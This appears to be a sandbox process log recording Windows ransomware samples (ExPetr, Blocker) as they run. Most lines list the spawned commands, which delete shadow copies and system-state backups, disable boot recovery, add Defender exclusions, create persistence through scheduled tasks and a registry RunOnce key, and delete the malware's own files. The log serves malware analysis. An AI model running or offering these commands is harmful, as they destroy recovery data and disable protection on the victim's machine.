C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\mshta.exe
mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo',i);}catch(e){}},10);"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\mshta.exe
mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\YGFAN\\HDUUQ'));close();"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.jgb-18b504ff04b980a44f40f513e247126bfb0c3330e1f6968813c4aec3636687a0.exe
Trojan-Ransom.Win32.Blocker.jgb-18b504ff04b980a44f40f513e247126bfb0c3330e1f6968813c4aec3636687a0.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" #/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Microsoft\Airexpress & exit
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" #/k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Holocryptic\Crossbarre.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\System32\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" flushdns
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /delete /tn Service /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /sc minute /mo 10 /tn Service /tr "C:\Windows\system32\Holocryptic\Crossbarre.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.jzec-3a37c244c3d21d29df73b5707f6f684b67c7141686c93899307c7466e6c9c82e.exe
Trojan-Ransom.Win32.Blocker.jzec-3a37c244c3d21d29df73b5707f6f684b67c7141686c93899307c7466e6c9c82e.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.mgn-a33bf1f44df944657ed1dd3cf6c1b5985f2dfe68c50140abd5a50149c4d4ed8c.exe
Trojan-Ransom.Win32.Blocker.mgn-a33bf1f44df944657ed1dd3cf6c1b5985f2dfe68c50140abd5a50149c4d4ed8c.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Microsoft\Airexpress
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Holocryptic\Crossbarre.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE
\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
